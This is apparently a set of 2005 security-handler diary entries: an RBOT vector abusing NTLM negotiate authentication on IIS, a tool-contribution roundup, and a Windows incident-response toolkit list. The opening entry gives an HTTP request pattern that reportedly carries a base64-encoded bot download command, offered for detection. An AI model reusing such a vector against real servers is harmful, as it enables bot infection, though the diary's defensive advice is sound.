On a similar note, we've had one report of what looks to be like another RBOT vector, this time SMB over HTTP. An IIS server will accept multiple forms of authentication, including (non-IIS folks cover your eyes, this will hurt) NTLM via base64 encoding. You looked....I warned you! Look for:

GET / HTTP/1.0
Host: xxx.xxx.xxx.xxx
Authorization: Negotiate

All that gibberish can be decoded with good ol' "mimencode -u" to reveal an RBOT tftp download command. The long and short of it is POLP - Principle of Least Privilege. Disable any authentication methods that are unnecessary, especially on your big-bad-world-facing servers. Me, I don't trust anyone to play nicely, inside or out.




Published: 2005-06-02

More tools, Google summer of code

More tools added

Many readers, and fellow handlers, have chimed in to add to the listing
of tools submitted by ScottF in yesterday's diary. I'll be listing them
here, and will find a more permanent home for the full compilation.
Updates will be posted throughout the remainder of my shift.

I personally have a preference for tools that are free, and open source.
Although I'll certainly take just free.

Here are my contributions:

Contributed by Harlan Carvey:

Contributed by Greg:

Contributed by Brian Patterson:

Contributed by John Franolich:

Root Kit Revealer.

Contributed by ScottF:

Contributed by Shaun Brachmann:

Contributed by Kahlib:

Contributed by Alpha:

Contributed by Steve Kiehl:

Google summer of code

Students can get paid to develop or contribute to open source software

projects this summer, including nmap.


Want to write open

source this summer?

Want to make money?

Want to do both?

My apologies to those who's tools submissions did not get included

this time around. There were many, and they were all good. I had

to cut it off somewhere.




Published: 2005-06-01

Quiet Day; U.S. CERT Summary; Scott's Toolkit for Windows

Quiet Day

This has been a really quiet day on the Net. Probably just as well, it has given this Handler some time to reflect on what I see going on out in the black hole we call the World Wide Web and think about how things have changed in the last 12 months or so. It never ceases to amaze me how incredibly intuitive our own Dr J. (Johannes U.) is. About a year ago I had a "discussion" with Johannes via email. I was in the process of developing a PowerPoint presentation for a workshop that I was giving on the Internet and its perils. One of the questions that I presented to Johannes was – If you could look to the future what do you think will be the biggest problem facing the Net in the next year or two. His answer to me at the time was “Botnets”. At the time I was surprised because I really hadn’t talked to anyone or worked with any computers that had been affected by “bots”. Ironically – just a few months later I now fully agree with the good “Dr. J”. I have dealt with so many computers in the last 9 months that are riddled with the little devils that I am beginning now to wonder if any computers exist that don’t have “bots”.

I haven’t had a chance to ask Johannes to answer that question again. I wonder if his answer will change. Humm!

Now how about you? What do you think will be the big problems in the summer of 2006? Maybe I will compile your replies and post them on June 1 of 2006. What do you think?
U.S. CERT Summary of Security Items from May 25 through May 31, 2005

U.S. CERT has released their summary. I find it quite interesting the number of new vulnerabilities and updated old vulnerabilities are identified. Make sure that you get your systems patched, plugged or whatever it is that the manufacturer recommends. We don't want any of you our faithful readers to fall to the devious hackers lurking out on the WWW.

Scott's Toolkit for Windows

A big thank you to one of our Handlers - Scott F - for providing us with his toolkit recommendations. This toolkit looks like it will provide you with everything you will need to monitor, troubleshoot and maintain you network.

If you have other windows based tools that you keep in your personal toolkit, please let us know through our .

Antivirus Tools
|-- McAfee Stinger (updated routinely)
|-- Symantec AV Corporate Edition v9 (soon to be v10)
|-- Microsoft Malware Removal Tool (released monthly)
|-- Current Symantec AV Intelligent Updater

|-- NetCat (available now at SecurityFocus)
|-- SysInternals AccessEnum
|-- SysInternals AutoRuns
|-- SysInternals Contig
|-- SysInternals DiskView
|-- SysInternals FileMon
|-- SysInternals ListDLLs
|-- SysInternals Page Defrag
|-- SysInternals ProcessExplorer
|-- SysInternals PS Tools
|-- SysInternals RegMon
|-- SysInternals Rootkit Revealer
|-- SysInternals Sdelete
|-- SysInternals ShareEnum
|-- SysInternals Sync
|-- SysInternals TCPView
|-- SysInternals Miscellaneous tools
|-- Heysoft LADS
|-- myNetWatchman SecCheck
|-- Inetcat.org NBTScan
|-- FoundStone BinText
|-- FoundStone Forensic Toolkit
|-- FoundStone Fport
|-- FoundStone Galleta
|-- FoundStone Pasco
|-- FoundStone Rifuti
|-- FoundStone Vision
|-- FoundStone ShoWin
|-- FoundStone SuperScan
|-- WinDump
|-- Nmap
|-- Tigerteam.se SBD (encrypted netcat)
|-- GNU based unxutils (from unixutils.sourceforge.net)
|-- Good copies of windows binaries (netstat, cmd, ipconfig, nbtstat)

Spyware Tools
|-- AdAware (updated defs in same directory)
|-- CWShredder
|-- Hijack This
|-- MS AntiSpyWare Beta
|-- Spybot Search and Destroy (updated defs in same directory)
|-- BHO Demon

Security Tools (this is my usual place to dump the .zip or .exe installers)
|-- Heysoft LADS (list alternate data streams)
|-- Inetcat.org NBTScan
|-- MS Baseline Security Analyzer
|-- MS IIS Lockdown tool
|-- Sam Spade
|-- SSH Client (SSH.com or Putty)
|-- SysInternals Tools
|-- Foundstone Tools
|-- BlackIce PC Protection
|-- Kerio Personal Firewall
|-- Zone Alarm Personal Firewall
|-- WinPcap
|-- WinDump
|-- Ethereal Installer
|-- Nmap for windows (cli version)

|-- Adobe Acrobat Reader Installer
|-- CPU-Z
|-- FireFox Installer
|-- Macromedia Flash and ShockWave Installers
|-- Quicktime Standalone Installer
|-- VNC Installer
|-- Winzip Installer
|-- ISCAlert

Service Packs ( on a 2nd CD )
|-- Windows XP SP2
|-- Windows 2000 SP4 (+rpc/lsass critical patches or SRP when released)
|-- Windows 2003 Server SP1

(Some additional CDs I keep around for the Unix geek in me)

Knoppix CD

Helix CD

Note: Any commercial software above that is not freeware/shareware in the list above should be replaced in your toolkit with your company or campus licensed software.

Here is wishing all of you a Good Night.

Deb Hale

Handler On Duty